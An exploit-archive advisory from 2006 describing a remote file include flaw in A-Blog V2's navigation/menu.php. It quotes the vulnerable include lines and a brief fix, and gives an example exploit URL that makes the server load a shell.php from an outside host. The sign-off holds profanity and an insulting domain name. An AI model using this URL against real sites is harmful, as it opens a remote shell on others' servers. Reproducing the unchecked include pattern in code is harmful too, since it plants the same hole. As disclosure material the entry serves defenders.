id: 892
date: 09/26/2006
title: A-Blog V2 (menu.php) Remote File Include Vulnerability
author: Drago84
cves: 

======================================================
A-Blog V2 (menu.php) Remote File Include Vulnerability
======================================================



###### ToXiC #########################
#
#A-Blog Remote File Include
#
#BuG FounD by Drago84
#
#Application Affect:A-Blog
#Problem:
#<?php include ("$navigation_start"); ?>
#<?php include("$navigation_middle"); ?>
#Soluction:
#Include in page require ("mainfile.php");
#Page Vulnerable : menu.php
#Dir : /navigation/
# Exempe Of ExPloit
is:
#http://www.site.com/ablog_dir/navigation/menu.php?navigation_start=http://marcusbestlamer.gay/shell.php?

#GrEatZ All Member of ToXiC, Str0ke
# Fuck Sonic,a|x
# ToXic Security Italian CreW

######
ToXiC
###################



#  0day.today [2023-03-26]  #